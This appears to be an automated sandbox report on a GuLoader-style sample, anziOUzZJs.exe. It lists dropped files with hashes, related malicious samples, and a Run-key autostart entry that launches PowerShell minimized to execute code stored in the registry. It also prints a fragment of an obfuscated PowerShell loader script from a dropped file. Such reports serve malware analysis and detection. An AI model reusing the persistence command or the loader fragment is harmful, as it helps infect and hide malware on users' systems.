                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, login.live.com, e16604.g.akamaiedge.net, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com
                • Execution Graph export aborted for target powershell.exe, PID 7800 because it is empty
• Not all processes were analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtSetInformationFile calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • VT rate limit hit for: anziOUzZJs.exe
Time | Type | Description
10:19:49 | API Interceptor | 39x Sleep call for process: powershell.exe modified
11:34:09 | API Interceptor | 2x Sleep call for process: svchost.exe modified
11:34:16 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
17:34:03 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Preferentialist %Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)
17:34:11 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Preferentialist %Therapeutic% -windowstyle minimized $Terrain=(Get-ItemProperty -Path 'HKCU:\Corycia\').mandskaber;%Therapeutic% ($Terrain)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 (JA3) | 4Z8GoGGGLH.exe | malicious | GuLoader | 142.250.184.238, 142.250.181.225
 | 3s1p0f5k7j.exe | malicious | Remcos, GuLoader | 142.250.184.238, 142.250.181.225
 | VG1l3rzJtd.exe | malicious | Remcos, GuLoader | 142.250.184.238, 142.250.181.225
 | Modifications_List.one | malicious | AZORult | 142.250.184.238, 142.250.181.225
 | Run First.exe | malicious | Unknown | 142.250.184.238, 142.250.181.225
 | Run First.exe | malicious | Unknown | 142.250.184.238, 142.250.181.225
 | SecuriteInfo.com.FileRepMalware.28303.12839.exe | malicious | Unknown | 142.250.184.238, 142.250.181.225
 | Unmovablety.exe | malicious | GuLoader, Snake Keylogger | 142.250.184.238, 142.250.181.225
 | PO 7001628119_61900PM.exe | malicious | FormBook, GuLoader | 142.250.184.238, 142.250.181.225
 | Document#.exe | malicious | Remcos | 142.250.184.238, 142.250.181.225

Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\nsu2C03.tmp\BgImage.dll | PTFE Coated Butterfly Valve Picture#U00b7pdf.exe | malicious | GuLoader, Lokibot
 | bPYR660y5o.exe | malicious | Azorult, GuLoader
 | uQP25xP5DH.exe | malicious | GuLoader
 | bPYR660y5o.exe | malicious | GuLoader
 | uQP25xP5DH.exe | malicious | GuLoader
 | R7MPO3ijgz.exe | malicious | GuLoader
 | tNET06vnWS.exe | malicious | GuLoader
 | R7MPO3ijgz.exe | malicious | GuLoader
 | 0bRKaeNvVp.exe | malicious | GuLoader
 | tNET06vnWS.exe | malicious | GuLoader
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.7066986611016322
                                    Encrypted:false
                                    SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vqx:2JIB/wUKUKQncEmYRTwh0t
                                    MD5:4E0299DE2AA6978B73BB724E4174F5C6
                                    SHA1:BBBAD59D358C86AD256A77C58CC7C54EE5566E7A
                                    SHA-256:945AAEC220EF816C19A3B8DDB81CED658D76617C2B682F79289EA76D366745BB
                                    SHA-512:757C4DA9C2BABDB432FD78B62FFFF8EAF8C8E23F8612E7E4B88E93A60048C166D281DA1C79CA83493AE9DDC847C203E15984F0A9C8C42D9A5B0DA1BF4164E7FB
                                    Malicious:false
                                    Reputation:low
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xd0726e56, page size 16384, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.7900084431344849
                                    Encrypted:false
                                    SSDEEP:1536:TSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:TazaPvgurTd42UgSii
                                    MD5:0E1AB4FBD5F684F3A8645CA71AE4394F
                                    SHA1:1E9772E53DD70A59910997F800BA84FB6586D07B
                                    SHA-256:E385CED213CD0FF47AB5849A83F59CD76BA90506895FAF041464956C5CD4A785
                                    SHA-512:C75211EE024624F311430AE80CB053C7CF2850C7B46E44324BDD6849E1DFB986FD4D71639660049FF06F44AE1C4547B9575C72193A855B569BE8E62749F68B5B
                                    Malicious:false
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.08220272451867672
                                    Encrypted:false
                                    SSDEEP:3:A4l/EYeb8hRXiqNt/57Dek3JbqnhllYllEqW3l/TjzzQ/t:AGEzb8hkqPR3tbaQmd8/
                                    MD5:2596C78702428BA9259997E05C51C155
                                    SHA1:E7FB7B6F04EA4CEE0224FF19DA1E726D76038A2C
                                    SHA-256:B281E70CE26D3F13E7DB28FDCB6EBD929DCD8104E3DA765CCB50F39CA04BD654
                                    SHA-512:FB517F1E1DA9EECE4A52C5F57D4791FAEF767F5817128D48C000CA415A172DB4FBF8C18EB1DE251C8C92EF1D98C879C9F9C9800FD9F763F7887A19322C86BD2B
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.6334241343281142
                                    Encrypted:false
                                    SSDEEP:192:DV5Cie/85b0aQH0BjanOynkQ5vpXNZrHzuiFuZ24IO8T:Bcj/85oaQH0BjoOe5vpfzuiFuY4IO8T
                                    MD5:FE53A2AED36D412A2E53CD77F64220D7
                                    SHA1:3AC5737D9D8C59DAC7195F22E0A1DDCBFC208B0B
                                    SHA-256:F524D872ED4C717AB340075DF971D38673709AE6AA1E99E3246AD2E3B5E3A3DA
                                    SHA-512:E57F15796721356BDEAA8905683AA91CD1001E8A9E475DBE557F99143D11D193EB1D802B3E68AE11C26B6F90D2C9F562BBC710510644E7EA9384C1FD37CA8063
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.633513850317114
                                    Encrypted:false
                                    SSDEEP:384:9Oocj/x50wzVPjoOe5vpfzuiFJY4IO8T:JcjX0wzVPjoxffzuiFJY4IO8
                                    MD5:F3429702FFA7D044666FB9434E884333
                                    SHA1:AB0CD1A570CF377D28C91832B23C1889AF0ADEBA
                                    SHA-256:07081F9AE2760F5D91A0DB95B9753CEAE99C32B05B12E78AB00ED2F6AA482C95
                                    SHA-512:7350B06E78256E1FE42CC9E072613BF21E9CDFB2B5DF2CD3395774BE903653B4A015433E331337C0F23D99E305FF93BE56B955BE0D5249A3A88CFC6875A4DFAD
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Mon Sep 2 15:34:12 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):547646
                                    Entropy (8bit):3.6305405035605074
                                    Encrypted:false
                                    SSDEEP:6144:rsRJ9cB5MsrHkTgGtOEIFHLGzNTmrynDrEK4b4JbZ4:rsRJmBOsjkTJtOEIxLGzkr0DrEUZ4
                                    MD5:EA57451BC8F400FF062C951A2108B2A5
                                    SHA1:DEC92D78CB6517F703EA808A90F93E3EC5DB3240
                                    SHA-256:79A4A73480E220A86B376946183EC08C89D5D9472C274425D7D304BC3CC46262
                                    SHA-512:9CAFD188EF48D04065F198891FB0B6A22F1A18EA19EE81C6D678526BCD0B8A5E77ABB32E01F4DED4F8671E138BEFF6123F8C021C3634F1E0E5055D64B707E84A
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8364
                                    Entropy (8bit):3.6955830713505886
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJPt60F6YkISUJzqgmfMDwhPprd89bcAsfgUm:R6lXJ16e6YLSUtqgmfMDwhIcTfy
                                    MD5:9C2D9030B7EE4C809E48787638175F03
                                    SHA1:2470E48B57F75ABD2E77AD2ED05D1EBBBB43F0F9
                                    SHA-256:9BF7805EED267FF5177CCAE50A3B405E071FC5BBCBC6D57C04C79504CEC986FC
                                    SHA-512:F1A506F17C90A6DC0017D43443232EF08DFDDD184C105263291A09A1CA8560F1A93B51F0ABFF8AC081FF474625C4B1E117ED389CC1FF0A695F07B9FED1A63046
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.0.0.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4676
                                    Entropy (8bit):4.461102753491631
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zs6Jg77aI94TWpW8VYSYm8M4JQULWFkp+q8RtgWX7+Hd:uIjfII7qi7VKJQUPuGE7+Hd
                                    MD5:C4037E21BA46596E1B29A36F8E77700E
                                    SHA1:50B0D24E74FA9F2EE560F78BB6C896089B58150C
                                    SHA-256:E910D4C0BCFDFB720869519DA4EE4DCD05691B9BED441C296D983BFF931EBC61
                                    SHA-512:C97C5CD4E4508A79904D05BC240453D6DA77B6698F17A8C932BB994B3558A783803B5AFC3B1641A293973A3A44B8EA688525DBC3208E71C23D17B543E15A3044
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="482796" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Mon Sep 2 15:34:17 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):527422
                                    Entropy (8bit):3.6737375742962417
                                    Encrypted:false
                                    SSDEEP:6144:Dguv4PjrVEK3TgG6YE4FHLGQj7mryTDrE+Bb4C:snLrV73TJ6YE4xLGQ+rIDrEa
                                    MD5:E22A4DA251C36A18CCFF00C4573D0DC1
                                    SHA1:612F4C35E01338BA9E8EA2A429C027CC9D99B2A8
                                    SHA-256:145729FFF0745155391295BEDADF8BE7F9384FD68745CC6E0E95A700D3B40308
                                    SHA-512:5D836E4C54A3CC1FE775C528717CB82715AFB0DCB9EDDF305C351108057EDED73A14F313175C2953A9EA7D0B6B778FEBD0281A574D54E5C521F4D6C0B04FEEF9
                                    Malicious:false
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8350
                                    Entropy (8bit):3.6953671662456964
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJPsA6uc6YkiSUJzqgmfMDE3pD089bfAsf+OYVm:R6lXJb616YBSUtqgmfMDEDfTf+OH
                                    MD5:CED8533939D0510C1F1ECB698A5D88E4
                                    SHA1:78185361506EC2E944AA54B609FA5E9A7F464C3D
                                    SHA-256:CABFFC03C45F059B5615365F9C2C7B6F349C6F57C048C74BEB2FFDF0B9694A7B
                                    SHA-512:2C478A17D8953260A8CF3846DD90F39AA19CB5182018FE0F267D98CEBC43EF19685E53FEEFB51F5257AC2CE10C974DECB5D4D100FA11FE1617A6C47CFE48D027
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.8.0.0.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4676
                                    Entropy (8bit):4.462262477908439
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zs6Jg77aI94TWpW8VYmYm8M4JQULIFi+q8RHgWX7+Hd:uIjfII7qi7VyJQUXuAE7+Hd
                                    MD5:AA8EA88C3A6D9AB2983392FF3E80995D
                                    SHA1:CA1647A28FA2D9459AB0039A0918F61435796998
                                    SHA-256:6CF87BE65E0E94EF32A388E07D5C5597701D3B55B4B3514EE19EF9C61D0FE36D
                                    SHA-512:524092DA2D2978DC5FBBAC3CF92A6DA94C9B0191548574EEDFCDDDA8867B0D919E8DCC9A824ECC4AF23FBD329AA1B31C0D963012B24C129AD93991D46ADA0B0F
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="482796" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):144
                                    Entropy (8bit):6.7202382826772995
                                    Encrypted:false
                                    SSDEEP:3:iynElHECO2xoCx3kUSTsKl+/ZSCXnJL+Xvpw2k2uq0lE1E79ZqRdPeCKN:i+A95xUUSTRwXJKBDeq0lE1E79ZEPeX
                                    MD5:8024497BFA1794517CA65FC0BB0AC37A
                                    SHA1:3AB426ACBCA1D17B6703235EED2342319452246E
                                    SHA-256:E767E44848B1C12581648E26F424CDB5E339676580B808E2EECC9EEEEC2D464C
                                    SHA-512:5EEF96165679C3003594E7F87BD78C5101AAD4E52CFDD235F3A7F2DB4587BB8015C90CF439B6AED9E4834E73335B1343DCB6812E49F1B951644DA9E91740DB59
                                    Malicious:true
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8003
                                    Entropy (8bit):4.840877972214509
                                    Encrypted:false
                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                    MD5:106D01F562D751E62B702803895E93E0
                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                    Malicious:false
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Category:dropped
                                    Size (bytes):469904
                                    Entropy (8bit):7.664240005553691
                                    Encrypted:false
                                    SSDEEP:12288:rKYi/LYz3kRV6h/3lObHOjeP/AxozXkYD:GFDg3ZhvlwHWiYx2UYD
                                    MD5:61BDBE7854F1572202F7916CF7F03616
                                    SHA1:E03A3385BC0CD5869C2A8CC72C80F4115B7B7945
                                    SHA-256:39F1703E13BDC112F4FFE9240F70CD5EB5B07CC218E6B22A8D58E4DCFAADD0A1
                                    SHA-512:B9B41EDE8456E65669DDF068BD6D277D60A7F2D233FA947636F998E9F77BC9BE72A4B27884C9CC1BB979BBC0A8488BA8EFA32375258492EB712ED864ECA3A9C6
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 53%
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):26
                                    Entropy (8bit):3.95006375643621
                                    Encrypted:false
                                    SSDEEP:3:ggPYV:rPYV
                                    MD5:187F488E27DB4AF347237FE461A079AD
                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                    Malicious:false
                                    Preview:[ZoneTransfer]....ZoneId=0
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):318391
                                    Entropy (8bit):7.697933383157832
                                    Encrypted:false
                                    SSDEEP:6144:Y0pdzZVmwH8552pWrL6dKhmOHuWKqWJepSQK9ETizjNIlVlDW6Vte:PdzPj85581KurXNqF7fe
                                    MD5:74C243E34B9FAFDD090165D998591C37
                                    SHA1:376964338A52695316FAD59455CD23269312CC21
                                    SHA-256:EA92D267A29EBEA630FC51E02B9E7C42683216B1B4BF1075063A58529657AB16
                                    SHA-512:4670D7E9EFE8D9738F9406E741991BF8E52DE94EAE4C202441E7C0457B4C120F6033893E4B1B1DDD69410EC3C39D8EDF3C86905CA41A7AAB1BD4B2FB9E06657C
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3241
                                    Entropy (8bit):4.944775379574013
                                    Encrypted:false
                                    SSDEEP:96:Q2ftN1sEMoxZkH07swucpg4PJAbZknQgEYmC:Q25sVoxZkU7swjJAbKr
                                    MD5:FFBF267C60266B56038D6F59A29667FE
                                    SHA1:6670DCFB19C1F662EEBB962C5C893E26BFDC6A3A
                                    SHA-256:92746E6CF37B022C9E65F638325D9A260109F8AD1CEFDCD9179023A8C43854BD
                                    SHA-512:1470D30B40F80EF601E0D8376FA43D868E05B812F56AA6CC214810C6723F2A44200EE518FDAC2637053E276A73603D3B89D204B7EBC96BAC47D38AB69D5799A0
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3035
                                    Entropy (8bit):4.819231644130541
                                    Encrypted:false
                                    SSDEEP:48:k7rOdr6t8TunETI1nCNkmnngXenfywhjPvzmW3FdCv0EMgjM1O6z/:YiKPnQsnCNIXQ7Pr91dCv0ngg1O6z/
                                    MD5:697432AE88310017784E05283190C05B
                                    SHA1:0D82F0C883FF55A4847542AD6BFE7C78B6751630
                                    SHA-256:39DADB40165C61C25E858A914F037CDE54B6CA6E280E563C11E14E8EAA5F360E
                                    SHA-512:768C4181E3455E0C67E2277B70C674F5C960C1A3A92629D8768D090BB2D4D0E7A9F1EAB7A3D690A0BEE004867C13799CBAEFD99BF27B42961112D3EFFF5DA45F
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2222
                                    Entropy (8bit):4.936428604121112
                                    Encrypted:false
                                    SSDEEP:48:qlPi2FAWuf1qnyfQY78osS6Dzld/6NLONulTXRHdrE7UpT:OPVFAWuAnUt7CJd/6NdB94YpT
                                    MD5:ACD3EA83BEA818BB3A99F3C9E9A1FD5E
                                    SHA1:9A7D6AB1713E6A20181F52EA1BCC2C0EADBF2D2C
                                    SHA-256:6BB38A6800A2E28AB2925EBAE75A5189FC3273186CD625117CAA436536F79EFA
                                    SHA-512:A1941147BA67E663D0F82719506E19BCD40EFB58D8D043DD03775E7EF68790FD9D56445DE3E4C7492DF969A01CE1C7B326A97760F943EBEBC1ADDAE5DFBBB859
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2613
                                    Entropy (8bit):4.8894208961850865
                                    Encrypted:false
                                    SSDEEP:48:mjy/OfwtDzyfqeQL/AvKzMs2cIgeN21iDIe3+lAsngxMiPYUXv+3eKx:V/OfyWfqx/AvuMyIgevDulHngxMCYUvS
                                    MD5:7CA2DD0BDBF021D85BB1BBCA305F4E4A
                                    SHA1:D454677A43D30A5107B0E50F16AECC25D4FDFA8B
                                    SHA-256:28D8BE59CFAB5805F4AB48AAA72B54079A69C2F48136108849E8F12C9C14F92C
                                    SHA-512:DA65ECA8E6865F609B0C7ECF136BDAC7231608D936F812C6C304CE3BB58C9C6F5E4CB9315A75B551B52F726B8A1B5E3FD7EF513A4A72F028B5E49E9D1D578641
                                    Malicious:false
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):69848
                                    Entropy (8bit):5.231907129230566
                                    Encrypted:false
                                    SSDEEP:1536:pKKk99E8fYyNfISb0QkDkWNSJPaHsP3aKAh1tx5H4vp80NaGf:pK1c8fYyNfgHYWgk8KKAHtxVsR
                                    MD5:E857291CF7CDCFD0413D85ABDB01F724
                                    SHA1:F4C0728BA5A0E78BC19489425DFB634327CD664D
                                    SHA-256:4DF3727A11C8E633D68D7DFB08F7A679AEA4B0CFCBDA2D54DA547499A9C66E16
                                    SHA-512:1007E794C375819BF7E1011BC27077422FC40B3B8648F2AAE98CDCEBA26E0C0944CC82BD6FE93B55B65A87C828B866AAF1260E588BB94D3088635E035BA71F30
                                    Malicious:false
                                    Preview:$Haarby=$Hvsningernes;<#Ejendomsrettighed Virological Fianced Wolfwards #><#Neuterly Behovsanalyse Waterquake Sturtan daughtership Protophyll drager #><#Novemfid Tekstndringen aktiedelingers Subdiversify Databidder Pseudoscorpiones Resp #><#Forkbeard Tuvaluanerens Kampdrifterne #><#Arcosoliulia Accumulative Mangelv #><#Grdhoveds Hellfires Artikulationernes Jae Cestoids parketgulves Forsigtighedsprincippet #>$Affaldsposerne = " Jenmak;Butterf`$ thaliaSDouse tuStrghanr Frem,erbeg,lnne Tvangsb Vognmau SenegatAfspadst,kalrtza Undernl AnnikulShanesrkGenistro Divideh Aa enmo onsysulAelodiclKongruesMaxintskUnprivia sydkord Lo pebepata.dstDiabeti= Vekse,`$ N.ttedSPassiveeSlingrecFjorlamuIndigitlredressaUnp evirRve.agtiUtaknemsO dskabaDyr,idstKamgarniBetvin oAlantranDuogr,v;ArchaeoFlab,lizuRemissfnTo.terecUdplyndtNoshingiUdome.roNonrelin,omanis Dehydret Skovpao ,seudowWonderdeGenop,rrStriddlh .ndlesiInpensilEnclo.slForbrugs Shorts Forbind(Transfo`$YuppiedSRootrivtSpasmsuoTvivlsou Prepernvinterg
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):429
                                    Entropy (8bit):4.305854628694936
                                    Encrypted:false
                                    SSDEEP:12:X7K4oHd8PiyEL3K6SP0rr2K34hmcaQeEi8fM4oGBGXHT+MIh:XOdHbyELoPflaQOIfGXHTzIh
                                    MD5:270491E6B4F6BAB6D9A2034416B1B695
                                    SHA1:098F4A1248E4AF2290F44C89D4288FBF742E00BC
                                    SHA-256:E20EB817C5E5DC93935980C16561D27728EFE357628D43A684793DB9F3130AD7
                                    SHA-512:CFC48A418C30FD8271979E3D3766D8071963FC60D36504DEBD3CC0EA8D35136AD86FF6B278D3E3B0BCF2B6A953EEA94DA802AA4014E9E3C8CB471B08FDF20862
                                    Malicious:false
                                    Preview:billyhood eivins opsigelsestidspunkters slyngrosers nonbreaching guarana..aerobranchiate boremestrene layouten.kubong udsvejfning hyklere pudsens.renummereringsfunktionens minniebush glycolyl nereidous cav clamshells veltilfredses vaerket produktforretningens..canser opel konfidensintervals afrejst niddingerne slumberproof kilobars brontosaurus gransknings..interactive kontortids archives gumboots unimpostrous costoabdominal.
                                    Process:C:\Users\user\Desktop\anziOUzZJs.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):3076
                                    Entropy (8bit):4.822151505827394
                                    Encrypted:false
